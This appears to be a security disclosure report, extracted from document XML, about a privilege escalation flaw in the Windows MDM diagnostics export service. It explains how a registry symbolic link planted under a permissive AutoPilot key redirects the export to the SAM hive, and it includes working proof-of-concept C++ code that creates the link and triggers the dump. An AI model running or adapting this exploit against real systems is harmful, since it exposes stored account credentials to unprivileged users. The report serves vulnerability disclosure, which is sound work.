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j218lhclr54a" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DmEnrollment Service - MDMdiagnostics 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j218lhclr54a" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure registry export - Escalation of Privilege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DmEnrollemnt service provides functionality that exports various data relevant for adminstration of computers managed by central authorities as schools or workplaces.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data gets collected by various services and packed as a single cab file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%PUBLIC%\Documents\MDMDiagnostics\MDMDiagReport.cab.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One of the data points is the the keys related to provisions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HKEY_LOCAL_MACHINE\software\microsoft\provisioning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service recursive iterates all keys and dumps values into the file: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MdmDiagReport_RegistryDump.reg </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">that will be one of the files inside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MDMDiagReport.cab.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Luck have it that one of the registry keys have more permissive permissions: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799889" cy="3919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9889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makes it possible to create a registry symbolic link at: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HKLM\SOFTWARE\Microsoft\Provisioning\Diagnostics\AutoPilot\a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That we can make target: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\registry\MACHINE\SAM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the service enumerates the registry keys the link will be follow and all keys and values in the SAMS hive will get exported.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registry symlink mitigations do not apply here because we link from one privileged hive to another.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Its only when linking from lover hives like hkey_current_user the policy applies and the link is not followed.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exported .reg file inside the can will end up with data like this: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Testen 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attached Proof Of Concept will launch the page where you press “export logs”, when executed and cab file is created the folder containing the file is opened.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Relevant source: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&lt;exploitLib/exploitLib.h&gt;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x::literalNS;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main(int, char* args[])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try { x::regKey{ "\\registry\\MACHINE\\SOFTWARE\\Microsoft\\Provisioning\\Diagnostics\\AutoPilot\\a",false,DELETE }.deleteKey(); } catch(...){}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x::createRegLinkKey{ "\\registry\\MACHINE\\SOFTWARE\\Microsoft\\Provisioning\\Diagnostics\\AutoPilot\\a" ,true }.setLinkDestination("\\registry\\MACHINE\\SAM");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x::process::ShellExecuteW(L"ms-settings:workplace");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x::file p{ "%public%\\documents"_p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auto yh=p.monitorFolderChanges(true, wil::FolderChangeEvents::All,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[&amp;](wil::FolderChangeEvent e, PCWSTR f)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if (std::wstring{ f } == L"MDMDiagnostics\\MDMDiagReport.cab"s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static auto once = (x::process::ShellExecuteW( "%public%\\documents\\MDMDiagnostics"_p ),true);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getchar();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catch (wil::ResultException&amp; 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std::wcout &lt;&lt; _com_error{ (HRESULT)RtlNtStatusToDosError(e.GetErrorCode()) }.ErrorMessage() &lt;&lt; std::endl;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std::wcout &lt;&lt; e.what() &lt;&lt; std::endl;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catch (std::exception&amp; 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std::wcout &lt;&lt; e.what() &lt;&lt; std::endl;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